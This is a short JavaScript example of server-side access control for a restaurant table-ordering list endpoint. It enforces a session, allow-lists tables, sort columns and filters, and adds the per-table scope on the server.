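A server-side sketch of the check these endpoints were missing, added here as an example (not code from the post or from the vendor): the handler requires a session, allow-lists tables, and adds the `self_cart_id` scope itself instead of trusting the request. The policy table, `buildGetlistQuery`, the `status` and `category_id` columns and the session shape are assumptions.

```javascript
// Hypothetical policy: which tables a table-card session may list, which
// column ties a row to that session, and which columns may be filtered/sorted.
const POLICY = {
  orders:     { scope: "self_cart_id", filter: ["status"], sort: ["id"] },
  categories: { scope: null, filter: [], sort: ["id", "name"] },
  products:   { scope: null, filter: ["category_id"], sort: ["id", "name"] },
};
const MAX_PER_PAGE = 50;

function buildGetlistQuery(session, params) {
  // 1. No anonymous access: the card code must have produced a live session.
  if (!session || !Number.isInteger(session.tableId)) {
    return { status: 401, error: "login required" };
  }
  // 2. Table allow-list: "customers" is not reachable from this role at all.
  const known = Object.prototype.hasOwnProperty.call(POLICY, params.t);
  if (!known) return { status: 403, error: "table not allowed" };
  const policy = POLICY[params.t];
  // 3. Sort column and direction come from an allow-list, never raw text.
  const m = /^([a-z_]+) (ASC|DESC)$/.exec(params.orderby || "id DESC");
  if (!m || !policy.sort.includes(m[1])) {
    return { status: 400, error: "bad orderby" };
  }
  // 4. Client filters: equality only, allow-listed columns, bound as parameters.
  const where = [], args = [];
  for (const f of Array.isArray(params.src) ? params.src : []) {
    if (f && f.name === policy.scope) continue; // client never picks the scope
    if (!f || f.compare !== "equal" || !policy.filter.includes(f.name)) {
      return { status: 400, error: "bad filter" };
    }
    where.push(`${f.name} = ?`);
    args.push(String(f.value));
  }
  // 5. The scope predicate is added by the server from the session, so
  //    changing or omitting "value" in the request cannot widen the result.
  if (policy.scope) {
    where.push(`${policy.scope} = ?`);
    args.push(session.tableId);
  }
  const sql = `SELECT * FROM ${params.t}` +
    (where.length ? ` WHERE ${where.join(" AND ")}` : "") +
    ` ORDER BY ${m[1]} ${m[2]} LIMIT ${MAX_PER_PAGE}`;
  return { status: 200, sql, args };
}
```

The returned `sql` and `args` are meant for a parameterized query API; the table and column names are interpolated only after matching the allow-list.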
